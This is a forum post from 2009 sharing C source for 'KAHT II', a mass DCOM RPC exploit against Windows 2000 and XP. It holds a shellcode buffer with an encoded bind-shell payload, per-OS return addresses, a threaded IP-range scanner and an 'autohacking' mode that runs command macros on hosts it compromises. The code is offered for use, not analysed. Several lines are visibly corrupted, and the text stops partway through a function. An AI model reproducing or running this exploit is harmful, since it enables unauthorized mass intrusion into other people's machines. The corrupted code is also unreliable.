Page 1 of 1

KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Thu Jun 25, 2009 11:10 pm
by wiLMaR_kiDz

Code: Select all

/*

   __________________________________________________
             KAHT II - MASSIVE RPC EXPLOIT
     DCOM RPC exploit. Modified by [email protected]
      #haxorcitos && #localhost  @Efnet Ownz you!!!
     REALLY PRIVATE VERSION (BETA 11) - AUTOHACKING
  Ported to Linux by Croulder croulder[at]croulder.com
   __________________________________________________



*/


[size=85]#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>


#ifdef WIN32
 #include <unistd.h>
 #include <windows.h>
 #include <process.h>
 #include <winsock2.h>
 #include <tcconio.h>
 #pragma comment (lib,"ws2_32.lib")
#else
#include <pthread.h>
#include <sys/types.h>
 #include <sys/ipc.h>
 #include <sys/sem.h>
#include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>
 #include <netdb.h>
 #include <fcntl.h>
 #include <unistd.h>
#endif

#define MAX_THREADS 			512
#define NTHREADS			50
#define PORT 				139
#define CONNECT 			6		//Connect Timeout
#define RECV 				5		//recv Timeout
#define ATTACKTIMEOUT 			5		//
#define RPC_FINGERPRINT_TIMEOUT         6		//rpc fingerprint
#define INITRPORT                     (rand()/2)+32767
//#define INITRPORT         		53		//PORT TO SPAWN A SHELL


int RPORT,salir=0,AUTOHACKING=0,threads=0,rpcopen=0;
int ip1[4],ip2[4];
FILE *results;	//results.txt ips con el puerto 139 abierto :D
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,cs,ãsÿo,csshell; //Givemeip CS, number of threads, ipstologfile,shell()



//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote  Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);


unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char winshellcode[]=
  "\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
  "\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
  "\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
  "\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
  "\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
  "\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
  "\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
  "\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
  "\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
  "\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
  "\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
  "\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
  "\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
  "\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
  "\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00"
  "\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00"
  "\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
  "\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
  "\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00"
  "\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
  "\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
  "\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00"
  "\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
  "\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
  "\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
  "\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
  "\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
  "\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
  "\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
  "\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
  "\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  "\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  "\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
  "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
  "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
  "\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
  "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00"
  "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
  "\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
  "\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
  "\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
  "\x07\x00\x00\x00\x00\x00\x00\x00";

struct
{
  char *os;
  u_long ret;
} targets[] =
   {
	  { "[Win2k]", 0x0018759F },
  	  { "[WinXP]", 0x0100139d },
	};



//GLOBALS...

/******************************************************************/

void banner(void)
{
			printf ("_________________________________________________        \n");
		printf("           KAHT II - MASSIVE RPC EXPLOIT\n");
		printf("  DCOM RPC exploit. Modified by [email protected]\n");
		printf("  #haxorcitos && #localhost  @Efnet Ownz you!!!\n");
		printf("              PUBLIC VERSION :P\n");
		printf ("________________________________________________\n\n");

}
void usage(void)
{
        printf(" Usage:   KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
		printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
		printf("\n  NEW!: Macros Available in shell enviroment!!\n  Type !! for more info into a shell.\n");
		//printf("  If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
        exit(1);
    }


/******************************************************************/
/*****************************************************************/
void execute_macro(char opt,int sock2){

	FILE *macro;
	char cadena[512];
	char tmp[512];
	int found=0;
	int delay=500;	//configurable TIMEOUT FOR CMDS - Default=500
	if ((macro=fopen("macros.txt","r")) !=NULL)
	{
		while (!feof(macro))
		{
				memset(cadena,'\0',sizeof(cadena));
				fgets(cadena,sizeof(cadena)-1,macro);
				cadena[strlen(cadena)-1]='\0';
				if ((found==1) && ((   strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
			            {
				        fclose(macro);
					printf(" + Ejecucion de La Macro Terminada\n");
					fclose(macro);return;}
				        if ((   strncmp(cadena,"delay=",strlen("delay="))) ==0)
					    delay=atoi(cadena+6);

				        if  ((   strncmp(cadena,"key=",strlen("key="))) ==0)
				   	   if (( cadena+strlen("key=!"))[0]==opt)
						   found=1; //OUR CMDS ARE HERE! :)

				        if  ( ((   strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
				           if (strlen(cadena)>strlen("cmd= "))
						{
							strcpy(tmp,cadena+4);
							strcat(tmp,"\r\n");
				 			send(sock2,tmp,strlen(tmp),0);
							//printf("Enviado: %s! de tamaño: %i\n",tmp,sizeof(tmp));
							sleep(delay);
						}
		}
		fclose(macro);
		send(sock2,"\n",strlen("\n"),0);
		printf(" - Macro Done -\n");
	}

	sleep(25);




}

/*****************************************************************/
void show_macros(int sock2){
	FILE *macro;
	char cadena[512];

	printf(" +______________(Available Macros)______________\n");
	if ((macro=fopen("macros.txt","r")) !=NULL)
	{
		while (!feof(macro))
		{
				memset(cadena,'\0',512);
				fgets(cadena,sizeof(cadena)-1,macro);
				if (strlen(cadena)>1)
				{
				cadena[strlen(cadena)-1]='\0';
				if  ((   strncmp(cadena,"name=",strlen("name="))) ==0)
					printf(" + Nombre: %s ",cadena+strlen("name="));
				if  ((strncmp(cadena,"key=",strlen("key="))) ==0)
					printf("Trigger: %s\n",cadena+strlen("key="));
			}
		}
		fclose(macro);
	}
	send(sock2,"\n",strlen("\n"),0);
	sleep(10);

}
/*****************************************************************/



void macro(char opt, int sock2)
{
	switch(opt)
	{
	case '!':
		show_macros(sock2);
		break;
	default:
		execute_macro(opt,sock2);
		break;
	}
}



/*****************************************************************/
void readconsole(void *sock2)
{
	int     l;
    char    buf[512];

if (AUTOHACKING) {
	execute_macro('9',(int) sock2);
	salir=1;
	}

	while(!salir)
	{
    	l = read (0, buf, sizeof (buf));
		if (l <= 0)
			salir=1;
		else
		{
  			if ( (l==3) && (buf[0]=='!') )
	  			macro(buf[1],(int)sock2);
  			else
	   		{
				send((int)sock2,buf,l,0);
				if (strncmp(buf,"exit",strlen("exit")) ==0)
				{
					salir=1;
					_endthread();
				}
			}
		}
	}

}

void enviamacro(void *sock2)
{
sleep(500);

macro(9,(int)sock2);
salir=1;
_endthread();


}

/****************************************************************/
int shell (int sock2) /* NOT RIPPED FROM TESO :P */
{
	int     l;
    char    buf[512];
	salir=0;
	_beginthread(readconsole,4096,(void *)(int) sock2);
    while (!salir)
	{
		if ((l=recv (sock2, buf, sizeof (buf),0))>0)
		write (1, buf, l);
		else sleep(100);

	}
	printf("\n - Connection Closed\n");
	return (salir);
}
/*****************************************************************/

int main(int argc, char **argv)
{
	 int i,total=NTHREADS;

    #ifdef WIN32
	WSADATA ws;

	clrscr();
    #endif
	banner();

	if(argc<3)
		usage();
    #ifdef WIN32
    if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
    {
        printf("  WSAStartup Error: %d\n",WSAGetLastError());
        exit(1);
    }
    #endif
	sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
	sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);

	for(i=0;i<4;i++)
	{
		if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
		if ( (ip2[i]>255) || (ip2[i]<0) ) usage();

	}
	if (argc==4) 	total=atoi(argv[3]);
	if (argc==5) 	AUTOHACKING=atoi(argv[4]);

#ifdef WIN32
	InitializeCriticalSection(&cs);
	InitializeCriticalSection(&css);
	InitializeCriticalSection(&cslog);
	InitializeCriticalSection(&csshell);
#else
	//Aqui meter los thread de linux :D y semaforos
#endif
	//ULTRA FAST PORT SCANNER....
	if ((results=fopen("results.txt","w"))==NULL) exit(0);
	printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
	srand ( time(NULL) );  RPORT=INITRPORT;
	printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
	printf(" [+] Scan In Progress...\n");
	for(i=0;i<total;i++)
              #ifdef WIN32
		_beginthread(checkea,8192,(void *)i);
	      #else
	        //Aqui meter los thread de linux :D y semaforos
              #endif
	while(threads>0)
	   sleep(100);
   fclose(results);
   printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);

return(0);
}


/****************************************************************************************/

//void attack(char *linea,int peta)
void attack(char *linea,int peta)
{
if (peta==-1)	return;


// if (AUTOHACKING!=1)
       #ifdef WIN32
	struct timeval tv;
       #else
	struct time_t tv;
       #endif
	struct sockaddr_in target_ip;
	int sock,sock2; //Exploit Socket && Shell Socket
	unsigned short port =  139;

	unsigned short lportl=666; /* drg */
        char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
   	unsigned char buf1[0x1000];
	u_long tmp=1; //TIMEOUTS
	FILE *w2k;
	FILE *wxp;
	int i;
	fd_set fds;
	//linea[strlen(linea-1)]='\0';

	EnterCriticalSection(&csshell);

	target_ip.sin_family = AF_INET;
   	target_ip.sin_addr.s_addr = inet_addr(linea);
        target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
    {
		printf(" - Connecting to %s\n",linea);

		tmp=1;
		ioctlsocket( sock, FIONBIO, &tmp);
		tv.tv_sec = CONNECT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(sock, &fds);

	    connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
		//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
		// if (i!=0)
		if((i=select(sock+1,0,&fds,0,&tv))>0)
	   	 {
		   printf("   Sending Exploit to a %s Server...",targets[peta].os);
		   tmp=0;
		   ioctlsocket( sock, FIONBIO, &tmp);
    		if (send(sock,bindstr,sizeof(bindstr),0)>0)
    		{
				tmp=1;
		   		ioctlsocket( sock, FIONBIO, &tmp);
				tv.tv_sec = RECV;
				tv.tv_usec = 0;
				FD_ZERO(&fds);
				FD_SET(sock, &fds);
				if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
				{
		   			recv(sock, buf1, 1000, 0);

					lportl=htons(RPORT);
					memcpy(&lport[1], &lportl, 2);
					*(long*)lport = *(long*)lport ^ 0x9432BF80;
					memcpy(&winshellcode[1351],&lport,4);
					memcpy(winshellcode+916, (unsigned char *	  tAr ets[peta].ret, 4);
					tmp=0;
			   		ioctlsocket( sock, FIONBIO, &tmp);

					send(sock,winshellcode,1705,0);
    				sleep(50);
					if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
					{
						target_ip.sin_family = AF_INET;
	   					target_ip.sin_addr.s_addr = inet_addr(linea);
	   					target_ip.sin_port = htons(RPORT);
						tmp=1;
						ioctlsocket( sock2, FIONBIO, &tmp);
						tv.tv_sec = CONNECT;
						tv.tv_usec = 0;
						FD_ZERO(&fds);
						FD_SET(sock2, &fds);
	    				connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
						if((i=select(sock+1,0,&fds,0,&tv))>0)
						{
						  printf("\n - Conectando con la Shell Remota...\n\n");
						  salir=0;
						  shell(sock2);
                                               #ifdef WIN32
						  closesocket(sock2);
                                               #else
						  close(sock2);
                                               #endif
						  strcat(linea,"\n");
			  			  if (peta==0)
							 {
								 w2k=fopen("win2k.txt","a");
								 if (w2k!=NULL)
								 	{ fputs(linea,w2k); fclose(w2k);}
								else printf(" !!UNABLE TO LOG IP %s",linea);

								}
						   else
							{

								wxp=fopen("winxp.txt","a");
								if (wxp!=NULL)
									{fputs(linea,wxp); fclose(wxp);}
								else printf(" !!UNABLE TO LOG IP %s",linea);
							}
						//} else 	printf("UNABLE TO CONNECT TO SHELL\n");
						} else 	printf("FAILED\n");
					}
					else printf("\n UNABLE TO CREATE SOCK2\n");
				}
				else printf(" FAILED to send Exploit2\n");
			}
			else printf(" FAILED to send Exploit\n");
		}

}
//if (AUTOHACKING!=1)
	LeaveCriticalSection(&csshell);

}

/*********************************************************************************/
char *givemeip(char *ip)
{

	EnterCriticalSection(&cs);


	if (ip1[3]!=254)
			ip1[3]++;
	else
	{
		ip1[2]++;
		ip1[3]=1;
		//return(NULL); //uhh!

	}
	if (ip1[2]==255)
	{	ip1[2]++; ip1[1]++;}

	LeaveCriticalSection(&cs);

	if (ip1[2]>ip2[2])   return(NULL);
	if (ip1[2]==ip2[2])
		if (ip1[3]>ip2[3]) return(NULL);

	sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);

	return(ip);
}

/******************************************************************************/

//int version(char *ip, int sock)

int version(char ip[16], int sock)
{
//sacado por ingenieria inversa del Scanner de ISS.


unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };


unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };

/*

unsigned char win2kvuln[] = {
 0x04,  0x00,  0x00,  0x00,
 0x00,  0x00,  0x00,  0x00,
 0x04,  0x5d,  0x88,  0x8a,
 0xeb,  0x1c,  0xc9,  0x11,
 0x9f,  0xe8,  0x08,  0x00,
 0x2b,  0x10,  0x48,  0x60,
 0x02,  0x00,  0x00,  0x00,
 0x00,  0x00,  0x00,  0x00,
 0x04,  0x5d,  0x88,  0x8a,
 0xeb,  0x1c,  0xc9,  0x11,
 0x9f,  0xe8,  0x08,  0x00,
 0x2b,  0x10,  0x48,  0x60,
 0x02,  0x00,  0x00,  0x00};
*/
	fd_set fds2;
	unsigned char buf[1024];

	int l;
	struct timeval tv2;
	FD_ZERO(&fds2);
	FD_SET(sock, &fds2);
	tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
	tv2.tv_usec = 0;

	memset(buf,'\0',sizeof(buf));
	send(sock,peer0_0,sizeof(peer0_0),0);
	if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
	{
		l=recv (sock, buf, sizeof (buf),0);
//		for(i=0;i<52;i++)
//		{
//			if (i==28)	i=i+4;
